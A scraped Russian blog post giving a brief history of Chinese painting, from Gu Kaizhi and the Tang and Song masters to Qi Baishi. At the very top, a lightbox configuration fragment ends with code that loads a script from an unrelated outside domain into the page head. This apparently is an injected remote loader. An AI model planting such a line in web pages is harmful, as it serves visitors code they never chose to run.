, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Живопись Китая

Автор: Дмитрий Алмазов | 26 Окт 2012

Ци Байши Пион

Живопись в Китае возникла более 6000 лет назад и была связана с керамическим производством, а позже и с ткачеством. Изобретение бумаги в 3 веке н.э. способствовало бурному развитию живописи и каллиграфии, вскоре начинается бурный расцвет этих видов искусства. Основоположником национальной живописи («гохуа») считается Гу Кайчжи (344-406). Его работа  «Фея реки Ло» (сохранилось 3 копии - Гугун, Пекин; Ляонинский  музей, Шэньян;   Галерея Фрир, Вашингтон) великолепно передает выдвинутый им принцип передачи  «настроение через форму»,  который лег в основу дальнейшего развития живописи.

Новый этап в развитии изобразительного искусства наступает во время правления династий Суй и Тан - 589-907 н.э. Организовываются живописные школы, оформляются жанры.  В это время бок о бок работали блистательные художники, поэты и каллиграфы. Среди выдающихся представителей эпохи необходимо отметить легендарного У Даоцзы (свиток «87 небожителей», Мемориальный музей, Сюй Бэйхун).  Появляется жанр портрета, один из его основоположников  Янь Либэнь  «Ученые династии Северная Ци» (Музей изящных искусств, Бостон). Ван Вэй – основатель школы монохромной пейзажной живописи («Горы под снегом»,  Гугун, Пекин),  еще один великолепный пейзажист Чжань Цзыцян (сине-зеленый пейзаж «Весенняя прогулка», Гугун, Пекин).

Ван Вэй горы под снегом

Эпоха Сун (960—1279) аккумулировала достижения живописи предыдущего периода, в это время создаются подлинные шедевры. Го Си, лучший китайский пейзажист, автор великолепных монохромных пейзажей («Ранняя весна» Гугун, Пекин). Чжан Цзэдуань –  мастер стиля гунби («По реке в день поминовения усопших» Гугун, Пекин).

Периоды Тан и Сун считаются золотым веком  китайской культуры. В дальнейшем, живописцы ограничились подражанием образцам этих эпох, но делали это виртуозно.

Из художников 20 века следует особо выделить Ци Байши (1864 - 1957). Он продолжил традиции национального искусства, создал десятки тысяч произведений.  Его работы вошли в сокровищницу мирового искусства.

Темы: Школа искусства, о Живописи | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress